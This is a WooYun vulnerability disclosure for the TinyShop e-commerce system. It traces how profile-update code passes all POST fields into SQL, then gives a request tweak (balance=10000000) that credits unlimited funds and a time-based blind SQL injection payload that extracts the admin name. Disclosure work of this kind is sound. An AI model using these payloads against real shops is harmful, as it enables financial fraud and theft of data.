当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068912

漏洞标题:TinyShop sql注入#3( 可无限充值)

相关厂商:tinyrise.com

漏洞作者: roker

提交时间:2014-07-18 11:11

修复时间:2014-10-16 11:12

公开时间:2014-10-16 11:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-18: 细节已通知厂商并且等待厂商处理中
2014-07-20: 厂商已经确认,细节仅向厂商公开
2014-07-23: 细节向第三方安全合作伙伴开放
2014-09-13: 细节向核心白帽子及相关领域专家公开
2014-09-23: 细节向普通白帽子公开
2014-10-03: 细节向实习白帽子公开
2014-10-16: 细节向公众公开

简要描述:

rt

详细说明:

我们看到
/protected/controllers/ucenter.php

public function info_save()
{
$name = Filter::sql(Req::args("name"));
$id = $this->user['id'];
$this->model->table("user")->data(array("name"=>$name))->where("id=$id")->update();
$this->model->table("customer")->where("user_id=$id")->update();
$obj = $this->model->table("user as us")->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.id=$id")->find();
$this->safebox->set('user',$obj,$this->cookie_time);
$this->redirect("info");
}


看到这行代码

$this->model->table("customer")->where("user_id=$id")->update();


继续跟到 updata()

public function update()
{
$sql = $this->sql;
if(!is_array($sql['data']) || count($sql['data'])<1)
{
$sql['data'] = Req::post();
}
$set = '';
foreach($sql['data'] as $key => $val)
{
if(is_string($key) && $key != $this->primary_key && isset($this->fields[$key]))
{
if(is_string($key))
{
$value = $val;
if(is_null($val)){
$value = 'NULL';
}else{
$value = $this->formatField($this->fields[$key],$val);
}
if(is_scalar($value))
{
if(!is_array($val) && preg_match("/`$key`/i",trim($val))){
$set .= '`'.$key.'` = '.$val.',';
}
else $set .= '`'.$key.'` = '.$value.',';
}
}
}
}
if($set!='')
{
$set = 'set '.trim($set,',');
$this->fields($set);
$this->changeWhere();
$sql = $this->sql;
$sqlStr = "update {$sql['table']} {$set} {$sql['where']}";
return $this->query($sqlStr);
}
}


post

public static function post()
{
$num = func_num_args();
$args = func_get_args();
if($num==1)
{
if(isset( $_POST[$args[0]])){
if(is_array( $_POST[$args[0]]))return $_POST[$args[0]];
else return trim( $_POST[$args[0]]);
}
return null;
}
else if($num>=2)
{
if($args[1]!==null) $_POST[$args[0]] = $args[1];
else if(isset($_POST[$args[0]])) unset($_POST[$args[0]]);
}
else
{
return $_POST;
}
}


如果调用updata()时没有传递 data数组。他会从post传递过来的数据 赋值于set 带入sql语句 。
#1 无限充值
我们 注册用户后 来到资料修改处
抓包 ,在原有的基础上 加上balance=10000000
例如

1.jpg


2.jpg


可以看到我瞬间土豪了。。。这个系统 还可以提现。。危害还是蛮大的。
#2 延时盲注
若 gpc关闭 或 php为高版本 我们还能进行盲注
修改 addr=' or if(ascii(substr((select name from tiny_manager),1,1))-97,null,sleep(2)) or '1

1.jpg


2.jpg


延时成功。

漏洞证明:

2.jpg


2.jpg

修复方案:

你们更专业

版权声明:转载请注明来源 roker@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-07-20 10:47

厂商回复:

非常感谢您为TinyShop信息安全做的贡献
我们将尽快修复,非常感谢您的支持。

最新状态:

暂无


漏洞评价:

评论